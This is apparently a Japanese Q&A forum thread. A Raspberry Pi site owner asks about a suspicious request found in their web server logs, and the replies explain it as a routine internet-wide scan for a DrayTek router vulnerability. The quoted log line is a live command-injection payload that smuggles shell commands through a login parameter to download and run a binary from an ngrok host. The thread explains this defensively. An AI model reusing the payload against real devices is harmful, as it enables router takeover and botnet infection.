今日私は、テキスト情報を共有することだけが目的のWebサイトをオープンしました。バックエンドにデータベースが接続されていないか、バックエンドで認証のアイデアがありません。しかし、ログを見ると、このリクエストに気づいていました。
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
これは2回発生したものであり、私のサーバーは両方とも404応答を返します。しかし今、私はそれについて少し心配しています。私のWebサイトはラズベリーで実行されており、ISPデバイスに接続されています。私のサーバーにSudo権限がない場合でも、リスクがあるかどうか疑問に思いますか?
また、この疑わしいエントリの意味を誰かに説明してもらえますか。リスクは何でしょうか?最後に、任意のデバイス(rapsberry)とインターネットの間にパイプを設定する際のヒント/良い動作を教えてください。
(たぶんタグで失敗したかもしれません、それを言うか更新してください)よろしくお願いします
心配する必要はありません。これは攻撃ですが、特定のサイトを狙ったものではなく、インターネットの大部分をスキャンして特定の脆弱性を探します。サーバーが404で応答したという事実は、脆弱なページが含まれていないことを意味します。
これは、公共のインターネットに公開されているすべてのサイトで発生し、バックグラウンドノイズの一部と見なされます。
私のWebサーバーでも同じリクエストに気づきました。攻撃に関する詳細は次のとおりです。 https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-draytek-products-could-allow-for-arbitrary-code-execution_2020-043/ =